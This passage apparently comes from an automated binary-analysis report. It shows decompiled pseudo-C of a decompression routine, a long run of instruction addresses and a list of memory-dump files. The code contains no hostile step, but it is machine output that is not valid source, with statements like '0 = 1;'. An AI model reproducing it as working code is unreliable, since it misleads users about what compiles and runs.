                                  												__eax = __esi[0x143];
                                  												while(1) {
                                  													L76:
                                  													__eflags = __ebx - __eax;
                                  													if(__ebx >= __eax) {
                                  														break;
                                  													}
                                  													L74:
                                  													__eflags =  *(__ebp - 0x34);
                                  													if( *(__ebp - 0x34) == 0) {
                                  														goto L182;
                                  													}
                                  													L75:
                                  													__ecx =  *(__ebp - 0x38);
                                  													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                  													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                  													__ecx = __ebx;
                                  													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                  													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                  													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                  													__ebx = __ebx + 8;
                                  													__eflags = __ebx;
                                  												}
                                  												L77:
                                  												__eax =  *(0x40a5c4 + __eax * 2) & 0x0000ffff;
                                  												__eax = __eax &  *(__ebp - 0x40);
                                  												__ecx = __esi[0x144];
                                  												__eax = __esi[0x144] + __eax * 4;
                                  												__edx =  *(__eax + 1) & 0x000000ff;
                                  												__eax =  *(__eax + 2) & 0x0000ffff;
                                  												__eflags = __eax - 0x10;
                                  												 *(__ebp - 0x14) = __eax;
                                  												if(__eax >= 0x10) {
                                  													L79:
                                  													__eflags = __eax - 0x12;
                                  													if(__eax != 0x12) {
                                  														__eax = __eax + 0xfffffff2;
                                  														 *(__ebp - 8) = 3;
                                  													} else {
                                  														_push(7);
                                  														 *(__ebp - 8) = 0xb;
                                  														_pop(__eax);
                                  													}
                                  													while(1) {
                                  														L84:
                                  														__ecx = __eax + __edx;
                                  														__eflags = __ebx - __eax + __edx;
                                  														if(__ebx >= __eax + __edx) {
                                  															break;
                                  														}
                                  														L82:
                                  														__eflags =  *(__ebp - 0x34);
                                  														if( *(__ebp - 0x34) == 0) {
                                  															goto L182;
                                  														}
                                  														L83:
                                  														__ecx =  *(__ebp - 0x38);
                                  														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                  														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
                                  														__ecx = __ebx;
                                  														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                  														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                  														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                  														__ebx = __ebx + 8;
                                  														__eflags = __ebx;
                                  													}
                                  													L85:
                                  													__ecx = __edx;
                                  													__ebx = __ebx - __edx;
                                  													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                  													 *(0x40a5c4 + __eax * 2) & 0x0000ffff =  *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                  													__edx =  *(__ebp - 8);
                                  													__ebx = __ebx - __eax;
                                  													__edx =  *(__ebp - 8) + ( *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                  													__ecx = __eax;
                                  													__eax = __esi[1];
                                  													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                  													__ecx = __esi[2];
                                  													__eax = __eax >> 5;
                                  													__edi = __eax >> 0x00000005 & 0x0000001f;
                                  													__eax = __eax & 0x0000001f;
                                  													__eax = __edi + __eax + 0x102;
                                  													__edi = __edx + __ecx;
                                  													__eflags = __edx + __ecx - __eax;
                                  													if(__edx + __ecx > __eax) {
                                  														goto L9;
                                  													}
                                  													L86:
                                  													__eflags =  *(__ebp - 0x14) - 0x10;
                                  													if( *(__ebp - 0x14) != 0x10) {
                                  														L89:
                                  														__edi = 0;
                                  														__eflags = 0;
                                  														L90:
                                  														__eax = __esi + 0xc + __ecx * 4;
                                  														do {
                                  															L91:
                                  															 *__eax = __edi;
                                  															__ecx = __ecx + 1;
                                  															__eax = __eax + 4;
                                  															__edx = __edx - 1;
                                  															__eflags = __edx;
                                  														} while (__edx != 0);
                                  														__esi[2] = __ecx;
                                  														continue;
                                  													}
                                  													L87:
                                  													__eflags = __ecx - 1;
                                  													if(__ecx < 1) {
                                  														goto L9;
                                  													}
                                  													L88:
                                  													__edi =  *(__esi + 8 + __ecx * 4);
                                  													goto L90;
                                  												}
                                  												L78:
                                  												__ecx = __edx;
                                  												__ebx = __ebx - __edx;
                                  												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                  												__ecx = __esi[2];
                                  												 *(__esi + 0xc + __esi[2] * 4) = __eax;
                                  												__esi[2] = __esi[2] + 1;
                                  											}
                                  											L94:
                                  											__eax = __esi[1];
                                  											__esi[0x144] = __esi[0x144] & 0x00000000;
                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
                                  											__edi = __eax;
                                  											__eax = __eax >> 5;
                                  											__edi = __edi & 0x0000001f;
                                  											__ecx = 0x101;
                                  											__eax = __eax & 0x0000001f;
                                  											__edi = __edi + 0x101;
                                  											__eax = __eax + 1;
                                  											__edx = __ebp - 0xc;
                                  											 *(__ebp - 0x14) = __eax;
                                  											 &(__esi[0x148]) = __ebp - 4;
                                  											 *(__ebp - 4) = 9;
                                  											__ebp - 0x18 =  &(__esi[3]);
                                  											 *(__ebp - 0x10) = 6;
                                  											__eax = E0040755C( &(__esi[3]), __edi, 0x101, 0x4084e8, 0x408528, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
                                  											__eflags =  *(__ebp - 4);
                                  											if( *(__ebp - 4) == 0) {
                                  												__eax = __eax | 0xffffffff;
                                  												__eflags = __eax;
                                  											}
                                  											__eflags = __eax;
                                  											if(__eax != 0) {
                                  												goto L9;
                                  											} else {
                                  												L97:
                                  												__ebp - 0xc =  &(__esi[0x148]);
                                  												__ebp - 0x10 = __ebp - 0x1c;
                                  												__eax = __esi + 0xc + __edi * 4;
                                  												__eax = E0040755C(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x408568, 0x4085a4, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
                                  												__eflags = __eax;
                                  												if(__eax != 0) {
                                  													goto L9;
                                  												}
                                  												L98:
                                  												__eax =  *(__ebp - 0x10);
                                  												__eflags =  *(__ebp - 0x10);
                                  												if( *(__ebp - 0x10) != 0) {
                                  													L100:
                                  													__cl =  *(__ebp - 4);
                                  													 *__esi =  *__esi & 0x00000000;
                                  													__eflags =  *__esi;
                                  													__esi[4] = __al;
                                  													__eax =  *(__ebp - 0x18);
                                  													__esi[5] =  *(__ebp - 0x18);
                                  													__eax =  *(__ebp - 0x1c);
                                  													__esi[4] = __cl;
                                  													__esi[6] =  *(__ebp - 0x1c);
                                  													goto L101;
                                  												}
                                  												L99:
                                  												__eflags = __edi - 0x101;
                                  												if(__edi > 0x101) {
                                  													goto L9;
                                  												}
                                  												goto L100;
                                  											}
                                  										case 0xe:
                                  											goto L9;
                                  										case 0xf:
                                  											L175:
                                  											__eax =  *(__ebp - 0x30);
                                  											__esi[0x26ea] =  *(__ebp - 0x30);
                                  											__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
                                  											__ecx = __esi[0x26ea];
                                  											__edx = __esi[0x26e9];
                                  											__eflags = __ecx - __edx;
                                  											 *(__ebp - 0x30) = __ecx;
                                  											if(__ecx >= __edx) {
                                  												__eax = __esi[0x26e8];
                                  												__eax = __esi[0x26e8] - __ecx;
                                  												__eflags = __eax;
                                  											} else {
                                  												__edx = __edx - __ecx;
                                  												__eax = __edx - __ecx - 1;
                                  											}
                                  											__eflags = __ecx - __edx;
                                  											 *(__ebp - 0x2c) = __eax;
                                  											if(__ecx != __edx) {
                                  												L183:
                                  												__edi = 0;
                                  												goto L10;
                                  											} else {
                                  												L179:
                                  												__eax = __esi[0x145];
                                  												__eflags = __eax - 8;
                                  												 *__esi = __eax;
                                  												if(__eax != 8) {
                                  													L184:
                                  													0 = 1;
                                  													goto L10;
                                  												}
                                  												goto L180;
                                  											}
                                  									}
                                  								}
                                  								L181:
                                  								goto L9;
                                  							}
                                  							L70:
                                  							if( *__edi == __eax) {
                                  								goto L72;
                                  							}
                                  							L71:
                                  							__esi[2] = __esi[2] & __eax;
                                  							 *__esi = 0xd;
                                  							goto L93;
                                  						}
                                  					}
                                  				}
                                  				L182:
                                  				_t443 = 0;
                                  				_t446[0x147] =  *(_t448 - 0x40);
                                  				_t446[0x146] = _t425;
                                  				( *(_t448 + 8))[1] = 0;
                                  				goto L11;
                                  			}









                                  0x00406d85
                                  0x00406d85
                                  0x00406d85
                                  0x00406d85
                                  0x00406d85
                                  0x00406d89
                                  0x00000000
                                  0x00000000
                                  0x00406d8f
                                  0x00406d8f
                                  0x00406d92
                                  0x00406d95
                                  0x00406d9a
                                  0x00406d9c
                                  0x00406d9f
                                  0x00406da2
                                  0x00406da5
                                  0x00406da5
                                  0x00406da8
                                  0x00000000
                                  0x00000000
                                  0x00406daa
                                  0x00406daa
                                  0x00406dad
                                  0x00406db2
                                  0x00406db4
                                  0x00406db7
                                  0x00406dbd
                                  0x00406b1c
                                  0x00406b1c
                                  0x00406b1f
                                  0x00406b25
                                  0x00406b2b
                                  0x00406b34
                                  0x00406b3a
                                  0x00406b3d
                                  0x00406b44
                                  0x00406b49
                                  0x00406b4f
                                  0x00406b5a
                                  0x00406b5a
                                  0x00406dc3
                                  0x00406dc3
                                  0x00406dcd
                                  0x00000000
                                  0x00000000
                                  0x00406dd3
                                  0x00406dd3
                                  0x00406dd7
                                  0x00406dda
                                  0x00406dda
                                  0x00406dde
                                  0x00406de4
                                  0x00406de4
                                  0x00406de7
                                  0x00406dea
                                  0x00406df0
                                  0x00000000
                                  0x00000000
                                  0x00406df2
                                  0x00406e14
                                  0x00406e14
                                  0x00406e17
                                  0x00000000
                                  0x00000000
                                  0x00406df4
                                  0x00406df8
                                  0x00000000
                                  0x00000000
                                  0x00406dfe
                                  0x00406dfe
                                  0x00406e01
                                  0x00406e04
                                  0x00406e09
                                  0x00406e0b
                                  0x00406e0e
                                  0x00406e11
                                  0x00406e11
                                  0x00406e19
                                  0x00406e19
                                  0x00406e1f
                                  0x00406e22
                                  0x00406e25
                                  0x00406e25
                                  0x00406e2c
                                  0x00406e30
                                  0x00406e34
                                  0x00406e37
                                  0x00406e3a
                                  0x00406e40
                                  0x00406e45
                                  0x00000000
                                  0x00000000
                                  0x00406e47
                                  0x00406e5b
                                  0x00406e5b
                                  0x00406e5f
                                  0x00000000
                                  0x00000000
                                  0x00406e49
                                  0x00406e4c
                                  0x00406e4c
                                  0x00406e53
                                  0x00406e58
                                  0x00406e58
                                  0x00406e58
                                  0x00406e61
                                  0x00406e61
                                  0x00406e64
                                  0x00406e72
                                  0x00406e78
                                  0x00406e7d
                                  0x00406e83
                                  0x00406e89
                                  0x00406e8f
                                  0x00406e96
                                  0x00406eaa
                                  0x00406eaa
                                  0x00407479
                                  0x00407479
                                  0x00407479
                                  0x0040747e
                                  0x00000000
                                  0x00000000
                                  0x00406ab6
                                  0x00406ab6
                                  0x00000000
                                  0x004070b1
                                  0x004070b1
                                  0x004070b5
                                  0x004070b8
                                  0x004070bb
                                  0x004070be
                                  0x00000000
                                  0x00000000
                                  0x004070c4
                                  0x004070c4
                                  0x004070e9
                                  0x004070e9
                                  0x004070e9
                                  0x004070eb
                                  0x00000000
                                  0x00000000
                                  0x004070c9
                                  0x004070c9
                                  0x004070cd
                                  0x00000000
                                  0x00000000
                                  0x004070d3
                                  0x004070d3
                                  0x004070d6
                                  0x004070d9
                                  0x004070dc
                                  0x004070de
                                  0x004070e0
                                  0x004070e3
                                  0x004070e6
                                  0x004070e6
                                  0x004070e6
                                  0x004070ed
                                  0x004070ed
                                  0x004070f5
                                  0x004070f8
                                  0x004070fb
                                  0x004070fe
                                  0x00407102
                                  0x00407105
                                  0x00407107
                                  0x0040710a
                                  0x0040710c
                                  0x00407120
                                  0x00407120
                                  0x00407123
                                  0x0040713d
                                  0x0040713d
                                  0x00407140
                                  0x00000000
                                  0x00000000
                                  0x00407146
                                  0x00407146
                                  0x00407149
                                  0x00000000
                                  0x00000000
                                  0x0040714f
                                  0x0040714f
                                  0x00000000
                                  0x0040714f
                                  0x00407125
                                  0x00407128
                                  0x0040712f
                                  0x00407132
                                  0x00000000
                                  0x00407132
                                  0x0040710e
                                  0x00407112
                                  0x00407115
                                  0x00000000
                                  0x00000000
                                  0x0040715a
                                  0x0040715a
                                  0x0040717f
                                  0x0040717f
                                  0x0040717f
                                  0x00407181
                                  0x00000000
                                  0x00000000
                                  0x0040715f
                                  0x0040715f
                                  0x00407163
                                  0x00000000
                                  0x00000000
                                  0x00407169
                                  0x00407169
                                  0x0040716c
                                  0x0040716f
                                  0x00407172
                                  0x00407174
                                  0x00407176
                                  0x00407179
                                  0x0040717c
                                  0x0040717c
                                  0x0040717c
                                  0x00407183
                                  0x0040718b
                                  0x0040718e
                                  0x00407191
                                  0x00407193
                                  0x00407196
                                  0x00407196
                                  0x00407198
                                  0x0040719c
                                  0x0040719f
                                  0x004071a2
                                  0x004071a5
                                  0x00000000
                                  0x00000000
                                  0x004071ab
                                  0x004071ab
                                  0x004071d0
                                  0x004071d0
                                  0x004071d0
                                  0x004071d2
                                  0x00000000
                                  0x00000000
                                  0x004071b0
                                  0x004071b0
                                  0x004071b4
                                  0x00000000
                                  0x00000000
                                  0x004071ba
                                  0x004071ba
                                  0x004071bd
                                  0x004071c0
                                  0x004071c3
                                  0x004071c5
                                  0x004071c7
                                  0x004071ca
                                  0x004071cd
                                  0x004071cd
                                  0x004071cd
                                  0x004071d4
                                  0x004071d4
                                  0x004071dc
                                  0x004071df
                                  0x004071e2
                                  0x004071e5
                                  0x004071e9
                                  0x004071ec
                                  0x004071ee
                                  0x004071f1
                                  0x004071f4
                                  0x0040720e
                                  0x0040720e
                                  0x00407211
                                  0x00000000
                                  0x00000000
                                  0x00407217
                                  0x00407217
                                  0x0040721a
                                  0x00407221
                                  0x00000000
                                  0x00407221
                                  0x004071f6
                                  0x004071f9
                                  0x00407200
                                  0x00407203
                                  0x00000000
                                  0x00000000
                                  0x00407229
                                  0x00407229
                                  0x0040724e
                                  0x0040724e
                                  0x0040724e
                                  0x00407250
                                  0x00000000
                                  0x00000000
                                  0x0040722e
                                  0x0040722e
                                  0x00407232
                                  0x00000000
                                  0x00000000
                                  0x00407238
                                  0x00407238
                                  0x0040723b
                                  0x0040723e
                                  0x00407241
                                  0x00407243
                                  0x00407245
                                  0x00407248
                                  0x0040724b
                                  0x0040724b
                                  0x0040724b
                                  0x00407252
                                  0x0040725a
                                  0x0040725d
                                  0x00407260
                                  0x00407262
                                  0x00407265
                                  0x00407265
                                  0x00407267
                                  0x00000000
                                  0x00000000
                                  0x0040726d
                                  0x0040726d
                                  0x00407270
                                  0x00407275
                                  0x00407277
                                  0x0040727d
                                  0x0040727f
                                  0x00407294
                                  0x00407296
                                  0x00407296
                                  0x00407281
                                  0x00407287
                                  0x00407289
                                  0x0040728b
                                  0x0040728b
                                  0x00407298
                                  0x0040729c
                                  0x0040729f
                                  0x004072a5
                                  0x004072a5
                                  0x004072a8
                                  0x004072a8
                                  0x004072a8
                                  0x004072aa
                                  0x00000000
                                  0x00000000
                                  0x004072b0
                                  0x004072b0
                                  0x004072b6
                                  0x004072b8
                                  0x004072dd
                                  0x004072e0
                                  0x004072e6
                                  0x004072eb
                                  0x004072f1
                                  0x004072f7
                                  0x004072f9
                                  0x004072fc
                                  0x00407305
                                  0x0040730b
                                  0x0040730b
                                  0x004072fe
                                  0x00407300
                                  0x00407302
                                  0x00407302
                                  0x0040730d
                                  0x00407313
                                  0x00407315
                                  0x00407318
                                  0x0040731a
                                  0x00407320
                                  0x00407322
                                  0x00407324
                                  0x00407326
                                  0x00407328
                                  0x0040732b
                                  0x00407334
                                  0x00407337
                                  0x00407337
                                  0x0040732d
                                  0x0040732d
                                  0x00407330
                                  0x00407330
                                  0x0040732b
                                  0x00407322
                                  0x00407339
                                  0x0040733b
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040733b
                                  0x004072ba
                                  0x004072ba
                                  0x004072c0
                                  0x004072c6
                                  0x004072c8
                                  0x00000000
                                  0x00000000
                                  0x004072ca
                                  0x004072ca
                                  0x004072cc
                                  0x004072ce
                                  0x004072d7
                                  0x004072d7
                                  0x004072d0
                                  0x004072d0
                                  0x004072d3
                                  0x004072d3
                                  0x004072d9
                                  0x004072db
                                  0x00000000
                                  0x00000000
                                  0x00407341
                                  0x00407341
                                  0x00407346
                                  0x00407348
                                  0x00407349
                                  0x0040734a
                                  0x0040734b
                                  0x00407351
                                  0x00407354
                                  0x00407357
                                  0x0040735a
                                  0x0040735c
                                  0x00407362
                                  0x00407362
                                  0x00407365
                                  0x00407365
                                  0x00407365
                                  0x00407365
                                  0x0040736e
                                  0x00000000
                                  0x00000000
                                  0x00407373
                                  0x00407373
                                  0x00407376
                                  0x00407379
                                  0x0040737b
                                  0x00407412
                                  0x00407412
                                  0x00407415
                                  0x00407417
                                  0x00407418
                                  0x00407419
                                  0x0040741c
                                  0x00000000
                                  0x0040741c
                                  0x00407381
                                  0x00407381
                                  0x00407387
                                  0x00407389
                                  0x004073ae
                                  0x004073b1
                                  0x004073b7
                                  0x004073bc
                                  0x004073c2
                                  0x004073c8
                                  0x004073ca
                                  0x004073cd
                                  0x004073d6
                                  0x004073dc
                                  0x004073dc
                                  0x004073cf
                                  0x004073d1
                                  0x004073d3
                                  0x004073d3
                                  0x004073de
                                  0x004073e4
                                  0x004073e6
                                  0x004073e9
                                  0x004073eb
                                  0x004073f1
                                  0x004073f3
                                  0x004073f5
                                  0x004073f7
                                  0x004073f9
                                  0x004073fc
                                  0x00407405
                                  0x00407408
                                  0x00407408
                                  0x004073fe
                                  0x004073fe
                                  0x00407401
                                  0x00407401
                                  0x004073fc
                                  0x004073f3
                                  0x0040740a
                                  0x0040740c
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040740c
                                  0x0040738b
                                  0x0040738b
                                  0x00407391
                                  0x00407397
                                  0x00407399
                                  0x00000000
                                  0x00000000
                                  0x0040739b
                                  0x0040739b
                                  0x0040739d
                                  0x0040739f
                                  0x004073a6
                                  0x004073a6
                                  0x004073a8
                                  0x004073a1
                                  0x004073a1
                                  0x004073a3
                                  0x004073a3
                                  0x004073aa
                                  0x004073ac
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00407424
                                  0x00407424
                                  0x00407427
                                  0x00407429
                                  0x0040742c
                                  0x0040742f
                                  0x0040742f
                                  0x0040742f
                                  0x0040742f
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00406add
                                  0x00406ac1
                                  0x00000000
                                  0x00406ac7
                                  0x00406aca
                                  0x00406ad4
                                  0x00406ad7
                                  0x00406ada
                                  0x00000000
                                  0x00406ada
                                  0x00406ac1
                                  0x00406ae5
                                  0x00406ae8
                                  0x00406aec
                                  0x00406af6
                                  0x00406b00
                                  0x00406b03
                                  0x00406b09
                                  0x00406c3d
                                  0x00406c3f
                                  0x00406c45
                                  0x00406c48
                                  0x00406c4b
                                  0x00000000
                                  0x00406c4b
                                  0x00406b0f
                                  0x00406b0f
                                  0x00406b10
                                  0x00406b68
                                  0x00406b68
                                  0x00406b6f
                                  0x00406c15
                                  0x00406c15
                                  0x00406c1a
                                  0x00406c1d
                                  0x00406c22
                                  0x00406c25
                                  0x00406c2a
                                  0x00406c2d
                                  0x00406c32
                                  0x00406c35
                                  0x00406c35
                                  0x00000000
                                  0x00406b75
                                  0x00406b75
                                  0x00406b75
                                  0x00406b75
                                  0x00406b79
                                  0x00406b79
                                  0x00406b9b
                                  0x00406b9e
                                  0x00406ba0
                                  0x00406ba3
                                  0x00406ba8
                                  0x00406b7e
                                  0x00406b7e
                                  0x00406b83
                                  0x00406b85
                                  0x00406b87
                                  0x00406b8c
                                  0x00406b92
                                  0x00406b97
                                  0x00406b99
                                  0x00406b99
                                  0x00406b8e
                                  0x00406b8e
                                  0x00406b8e
                                  0x00406b8c
                                  0x00000000
                                  0x00406baa
                                  0x00406bd7
                                  0x00406bdc
                                  0x00406bde
                                  0x00406bdf
                                  0x00406be1
                                  0x00406be2
                                  0x00406be2
                                  0x00406be2
                                  0x00406c0a
                                  0x00406c0f
                                  0x00406c0f
                                  0x00000000
                                  0x00406c0f
                                  0x00406ba8
                                  0x00406b6f
                                  0x00406b12
                                  0x00406b12
                                  0x00406b13
                                  0x00406b5d
                                  0x00000000
                                  0x00406b5d
                                  0x00406b15
                                  0x00406b16
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00406c72
                                  0x00406c72
                                  0x00406c72
                                  0x00406c75
                                  0x00000000
                                  0x00000000
                                  0x00406c52
                                  0x00406c52
                                  0x00406c56
                                  0x00000000
                                  0x00000000
                                  0x00406c5c
                                  0x00406c5c
                                  0x00406c5f
                                  0x00406c62
                                  0x00406c67
                                  0x00406c69
                                  0x00406c6c
                                  0x00406c6f
                                  0x00406c6f
                                  0x00406c6f
                                  0x00406c77
                                  0x00406c77
                                  0x00406c7a
                                  0x00406c7c
                                  0x00406c81
                                  0x00406c84
                                  0x00406c86
                                  0x00406c89
                                  0x00000000
                                  0x00000000
                                  0x00406c8f
                                  0x00406c8f
                                  0x00406c91
                                  0x00000000
                                  0x00000000
                                  0x00406c97
                                  0x00406c97
                                  0x00406c9b
                                  0x00000000
                                  0x00000000
                                  0x00406ca1
                                  0x00406ca1
                                  0x00406ca4
                                  0x00406ca6
                                  0x00406d44
                                  0x00406d44
                                  0x00406d47
                                  0x00406d49
                                  0x00406d49
                                  0x00406d4c
                                  0x00406d4f
                                  0x00406d51
                                  0x00406d53
                                  0x00406d55
                                  0x00406d55
                                  0x00406d5e
                                  0x00406d63
                                  0x00406d66
                                  0x00406d69
                                  0x00406d6c
                                  0x00406d6f
                                  0x00406d6f
                                  0x00406d6f
                                  0x00406d72
                                  0x00406d78
                                  0x00406d78
                                  0x00406d7e
                                  0x00406d7e
                                  0x00406d7e
                                  0x00000000
                                  0x00406d72
                                  0x00406cac
                                  0x00406cac
                                  0x00406cb2
                                  0x00406cb5
                                  0x00406cb7
                                  0x00406ce2
                                  0x00406ce5
                                  0x00406ceb
                                  0x00406cf0
                                  0x00406cf6
                                  0x00406cfc
                                  0x00406cfe
                                  0x00406d01
                                  0x00406d0a
                                  0x00406d10
                                  0x00406d10
                                  0x00406d03
                                  0x00406d05
                                  0x00406d07
                                  0x00406d07
                                  0x00406d12
                                  0x00406d18
                                  0x00406d1b
                                  0x00406d1d
                                  0x00406d1f
                                  0x00406d25
                                  0x00406d27
                                  0x00406d29
                                  0x00406d2c
                                  0x00406d35
                                  0x00406d35
                                  0x00406d37
                                  0x00406d2e
                                  0x00406d2e
                                  0x00406d31
                                  0x00406d31
                                  0x00406d39
                                  0x00406d39
                                  0x00406d27
                                  0x00406d3c
                                  0x00406d3e
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00406d3e
                                  0x00406cb9
                                  0x00406cb9
                                  0x00406cbf
                                  0x00406cc5
                                  0x00406cc7
                                  0x00000000
                                  0x00000000
                                  0x00406cc9
                                  0x00406cc9
                                  0x00406ccb
                                  0x00406ccd
                                  0x00406cd0
                                  0x00406cd7
                                  0x00406cd7
                                  0x00406cd9
                                  0x00406cd2
                                  0x00406cd2
                                  0x00406cd4
                                  0x00406cd4
                                  0x00406cdb
                                  0x00406cdd
                                  0x00406ce0
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00406de4
                                  0x00406de7
                                  0x00406dea
                                  0x00406df0
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00406fc7
                                  0x00406fc7
                                  0x00406fc7
                                  0x00406fca
                                  0x00406fcd
                                  0x00406fcf
                                  0x00406fd2
                                  0x00406fd8
                                  0x00406fdf
                                  0x00406fe1
                                  0x00000000
                                  0x00000000
                                  0x00406eb5
                                  0x00406eb5
                                  0x00406edd
                                  0x00406edd
                                  0x00406edd
                                  0x00406edf
                                  0x00000000
                                  0x00000000
                                  0x00406ebd
                                  0x00406ebd
                                  0x00406ec1
                                  0x00000000
                                  0x00000000
                                  0x00406ec7
                                  0x00406ec7
                                  0x00406eca
                                  0x00406ecd
                                  0x00406ed0
                                  0x00406ed2
                                  0x00406ed4
                                  0x00406ed7
                                  0x00406eda
                                  0x00406eda
                                  0x00406eda
                                  0x00406ee1
                                  0x00406ee1
                                  0x00406ee9
                                  0x00406eec
                                  0x00406ef2
                                  0x00406ef5
                                  0x00406ef9
                                  0x00406efd
                                  0x00406f00
                                  0x00406f03
                                  0x00406f1b
                                  0x00406f1b
                                  0x00406f1e
                                  0x00406f2c
                                  0x00406f2f
                                  0x00406f20
                                  0x00406f20
                                  0x00406f22
                                  0x00406f29
                                  0x00406f29
                                  0x00406f58
                                  0x00406f58
                                  0x00406f58
                                  0x00406f5b
                                  0x00406f5d
                                  0x00000000
                                  0x00000000
                                  0x00406f38
                                  0x00406f38
                                  0x00406f3c
                                  0x00000000
                                  0x00000000
                                  0x00406f42
                                  0x00406f42
                                  0x00406f45
                                  0x00406f48
                                  0x00406f4b
                                  0x00406f4d
                                  0x00406f4f
                                  0x00406f52
                                  0x00406f55
                                  0x00406f55
                                  0x00406f55
                                  0x00406f5f
                                  0x00406f5f
                                  0x00406f61
                                  0x00406f63
                                  0x00406f6e
                                  0x00406f71
                                  0x00406f74
                                  0x00406f76
                                  0x00406f78
                                  0x00406f7a
                                  0x00406f7d
                                  0x00406f80
                                  0x00406f85
                                  0x00406f88
                                  0x00406f8b
                                  0x00406f8e
                                  0x00406f95
                                  0x00406f98
                                  0x00406f9a
                                  0x00000000
                                  0x00000000
                                  0x00406fa0
                                  0x00406fa0
                                  0x00406fa4
                                  0x00406fb5
                                  0x00406fb5
                                  0x00406fb5
                                  0x00406fb7
                                  0x00406fb7
                                  0x00406fbb
                                  0x00406fbb
                                  0x00406fbb
                                  0x00406fbd
                                  0x00406fbe
                                  0x00406fc1
                                  0x00406fc1
                                  0x00406fc1
                                  0x00406fc4
                                  0x00000000
                                  0x00406fc4
                                  0x00406fa6
                                  0x00406fa6
                                  0x00406fa9
                                  0x00000000
                                  0x00000000
                                  0x00406faf
                                  0x00406faf
                                  0x00000000
                                  0x00406faf
                                  0x00406f05
                                  0x00406f05
                                  0x00406f07
                                  0x00406f09
                                  0x00406f0c
                                  0x00406f0f
                                  0x00406f13
                                  0x00406f13
                                  0x00406fe7
                                  0x00406fe7
                                  0x00406fea
                                  0x00406ff1
                                  0x00406ff5
                                  0x00406ff7
                                  0x00406ffa
                                  0x00406ffd
                                  0x00407002
                                  0x00407005
                                  0x00407007
                                  0x00407008
                                  0x0040700b
                                  0x00407016
                                  0x00407019
                                  0x00407030
                                  0x00407035
                                  0x0040703c
                                  0x00407041
                                  0x00407045
                                  0x00407047
                                  0x00407047
                                  0x00407047
                                  0x0040704a
                                  0x0040704c
                                  0x00000000
                                  0x00407052
                                  0x00407052
                                  0x00407056
                                  0x00407061
                                  0x00407074
                                  0x00407079
                                  0x0040707e
                                  0x00407080
                                  0x00000000
                                  0x00000000
                                  0x00407086
                                  0x00407086
                                  0x00407089
                                  0x0040708b
                                  0x00407099
                                  0x00407099
                                  0x0040709c
                                  0x0040709c
                                  0x0040709f
                                  0x004070a2
                                  0x004070a5
                                  0x004070a8
                                  0x004070ab
                                  0x004070ae
                                  0x00000000
                                  0x004070ae
                                  0x0040708d
                                  0x0040708d
                                  0x00407093
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00407093
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00407432
                                  0x00407432
                                  0x00407438
                                  0x0040743e
                                  0x00407443
                                  0x00407449
                                  0x0040744f
                                  0x00407451
                                  0x00407454
                                  0x0040745d
                                  0x00407463
                                  0x00407463
                                  0x00407456
                                  0x00407458
                                  0x0040745a
                                  0x0040745a
                                  0x00407465
                                  0x00407467
                                  0x0040746a
                                  0x004074a5
                                  0x004074a5
                                  0x00000000
                                  0x0040746c
                                  0x0040746c
                                  0x0040746c
                                  0x00407472
                                  0x00407475
                                  0x00407477
                                  0x004074ac
                                  0x004074ae
                                  0x00000000
                                  0x004074ae
                                  0x00000000
                                  0x00407477
                                  0x00000000
                                  0x00406ab6
                                  0x00407484
                                  0x00000000
                                  0x00407484
                                  0x00406e98
                                  0x00406e9a
                                  0x00000000
                                  0x00000000
                                  0x00406e9c
                                  0x00406e9c
                                  0x00406e9f
                                  0x00000000
                                  0x00406e9f
                                  0x00406de4
                                  0x00406da5
                                  0x00407489
                                  0x0040748c
                                  0x0040748e
                                  0x00407497
                                  0x0040749d
                                  0x00000000

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.777947969.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.777940223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777964906.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777971054.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777977082.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778005953.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778015938.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
